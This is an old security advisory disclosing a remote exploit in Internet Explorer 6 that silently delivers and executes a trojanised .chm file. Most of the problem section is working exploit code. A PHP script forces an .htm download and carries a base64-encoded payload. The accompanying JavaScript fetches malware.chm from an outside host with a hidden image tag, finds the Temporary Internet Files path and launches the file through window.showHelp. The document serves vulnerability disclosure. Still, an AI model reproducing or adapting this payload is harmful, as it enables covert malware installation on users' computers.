COMMAND

	IE silent software delivery (remote exploit)

SYSTEMS AFFECTED

	Internet Exlorer 6

PROBLEM

	http_equiv of malware [http://www.malware.com] found :
	

	Yet another silent delivery and installation of  an  executable  on  the
	target computer using Internet  Exlorer  6.  This  can  be  achieved  by
	reversing the following:
	

	http://online.securityfocus.com/bid/5350

	

	And:
	

	HTM. In order to to achieve the required  results  as  outlined  in  the
	above, we must determine the location of  the  Temporary  Internet  File
	[TIF] folders. This can only be achieved if we can  physically  open  up
	our file from within and read its location. Technically  that  can  only
	be achieved if  we  have  a  security  dialogue  prompt  asking  us  for
	permission. If we elect to open  the  file  through  acceptance  of  the
	security warning dialogue, it is opened from within the TIF by  whatever
	program is associated with that file.
	

	Okay:
	

	Okay. HTM. HTM files are associated with  Internet  Explorer.  We  force
	our *.htm file open via a combination of server  `misconfiguration`  and
	our PHP 'package' as below:
	

	<?

	function malware()

	{

	header("Content-type: text/html");

	header("Content-Disposition: attachment");

	echo base64_decode(

	'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.

	'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.

	'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.

	'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.

	'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.

	'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.

	'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.

	'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.

	'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.

	'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.

	'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.

	'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.

	'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.

	'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.

	'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.

	'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.

	'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.

	'0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');}

	{ malware(); }

	PHP ?>

	

	  <iframe src=<? echo $PHP_SELF ?> width=1 height=1>

	

	Where our PHP 'package' contains our now  run-of-the-mill  scripting  to
	determine our TIF location and our old friend the trojanised *.chm  file
	as follows:
	

	<img dynsrc="http://www.malware.com/malware/malware.chm" width=1

	height=1>

	

	<SCRIPT>

	

	// 7.02.02 http://www.malware.com

	

	function malware()

	{

	s=document.URL;

	path=s.substr(-0,s.lastIndexOf(""));

	path=unescape(path);

	document.write('<FORM name="malware"

	ACTION="javascript:window.showHelp(document.forms[0].elements

	[0].value)">');

	document.write('<form><input type="hidden" size="40" maxlength="80"

	value="'+path+'malware[1].chm"></form>');

	setTimeout('document.malware.submit()',10000);

	 }

	setTimeout("malware()",2500);

	</SCRIPT>

	

	note: file path for *.chm must be long as we are now operating  off  the
	server and from within the TIF
	

	What this does is  generate  the  default  security  warning  for  *.htm
	flles:
	

	[screen shot: http://www.malware.com/malwarez.png 7KB]

	

	Should we elect to open it, we are once again able to determine our  TIF
	location where our *.chm is now residing too and fire our  scripting  to
	locate and call it.
	

	[screen shot: http://www.malware.com/zerawlam.png 7KB]

	

	Notes:
	

	1.    As     indicated     this     is     the     reverse     for     :
	http://online.securityfocus.com/bid/5350 . In this instance the  default
	is the security warning which should be  disengaged  to  allow  this  to
	fail.
	

	2 Tested series of win98 machines, Internet Explorer  6.0.2600  and  all
	of its bandages
	

	3. We anxiously await the release of Internet Explorer 6 SP1.

SOLUTION

	None yet.